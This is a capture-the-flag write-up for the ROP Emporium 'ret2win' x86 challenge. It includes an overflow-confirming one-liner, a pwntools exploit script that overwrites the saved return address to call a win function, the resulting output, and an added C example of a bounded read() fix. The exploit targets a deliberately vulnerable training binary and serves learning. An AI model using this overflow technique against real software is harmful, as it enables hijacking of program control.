#rop
# ret2win x86
## Triage

Like the website says, these challenges are based on ROPing, so NX will be enabled on all of them.
### Disassembly
The main function calls the vulnerable function pwnme:

The pwnme function:

## Vulnerability
In the pwnme function, 56 bytes are read into the user_input buffer, but user_input sits on the stack at -0x2c (44) bytes from the saved return address.
If we supply 44 bytes of padding, the next 4 bytes overwrite the return address and we gain control of the program counter.
Confirming the vulnerability:
```bash
python -c 'print "A"*44+"BBBB"' | strace ./ret2win32
```
```bash
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
+++ killed by SIGSEGV (core dumped) +++
[1] 3224389 done python -c 'print "A"*44+"BBBB"' |
3224390 segmentation fault (core dumped) strace ./ret2win32
```
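The fault address `0x42424242` is the four `B` bytes landing in the saved return address. As an added example (not part of the original write-up or of the ROP Emporium challenge sources), the C below contrasts the unbounded `read()` shape the challenge banner describes (56 bytes requested into a 32-byte stack buffer) with a bounded reader that never requests more than the buffer can hold, and includes a small helper for auditing how far a given `read()` request would spill past its buffer. All function names are my own.

```c
// Added example, not from the write-up or the challenge. Shows the fix
// for the "56 bytes into a 32-byte buffer" pattern: bound the read()
// length by the buffer size so the saved return address is never reached.
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 32            /* stack buffer size stated in the banner */
#define CHALLENGE_READ_LEN 56  /* read() length stated in the banner */

/*
 * The vulnerable shape, as the challenge describes it (not compiled here):
 *
 *     char buf[BUF_SIZE];
 *     read(0, buf, CHALLENGE_READ_LEN);   // 24 bytes past the end of buf
 *
 * With buf 44 bytes below the saved return address, input bytes 45..48
 * overwrite it, which is exactly what the strace output above shows.
 */

/* Bounded variant: request at most cap-1 bytes and always NUL-terminate.
 * Returns the number of bytes stored, or -1 on error. */
ssize_t read_input_bounded(int fd, char *buf, size_t cap) {
    if (cap == 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

/* Audit helper: how many bytes a read() of request_len would write past
 * a buffer of cap bytes. For the challenge values this is 56 - 32 = 24. */
size_t overflow_bytes(size_t cap, size_t request_len) {
    return request_len > cap ? request_len - cap : 0;
}

/* Feed 56 constructed 'A' bytes through a pipe into a 32-byte buffer via
 * the bounded reader. At most 31 bytes are stored; the rest stays unread. */
ssize_t demo_bounded_read(void) {
    int fds[2];
    if (pipe(fds) != 0) return -1;

    char input[CHALLENGE_READ_LEN];          /* constructed oversized input */
    memset(input, 'A', sizeof input);
    if (write(fds[1], input, sizeof input) != (ssize_t)sizeof input) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    close(fds[1]);

    char buf[BUF_SIZE];
    ssize_t n = read_input_bounded(fds[0], buf, sizeof buf);
    close(fds[0]);
    return n;
}

int main(void) {
    printf("unbounded read would spill %zu bytes past the buffer\n",
           overflow_bytes(BUF_SIZE, CHALLENGE_READ_LEN));
    printf("bounded read stored %zd bytes\n", demo_bounded_read());
    return 0;
}
```

The same bound applies to any fixed-size stack buffer filled by `read()`, `recv()` or `fgets()`: the length argument must derive from `sizeof` the buffer, not from the amount the caller hopes to receive.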
## Exploit
The binary contains a win function:

Setting the program counter to `0x804862c`, the address of `ret2win`, will execute the win function.
### Script
```python
from pwn import *

# Load the binary so pwntools resolves symbol addresses for us
context.binary = elf = ELF("./ret2win32")

# 44 bytes of padding reach the saved return address (bytes, not str,
# so the concatenation with p32() works under Python 3)
payload = b"A" * 44
# Overwrite the return address with the address of ret2win (0x804862c)
payload += p32(elf.sym['ret2win'])

io = process("./ret2win32")
io.sendline(payload)
io.interactive()
```
### Result
```bash
[*] '/home/chris/ctfs/ropemporium/ret2win/x86/ret2win32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process './ret2win32': pid 3244643
[*] Switching to interactive mode
ret2win by ROP Emporium
x86
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!
> Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
[*] Got EOF while reading in interactive
$
[*] Interrupted
[*] Process './ret2win32' stopped with exit code -11 (SIGSEGV) (pid 3244643)
```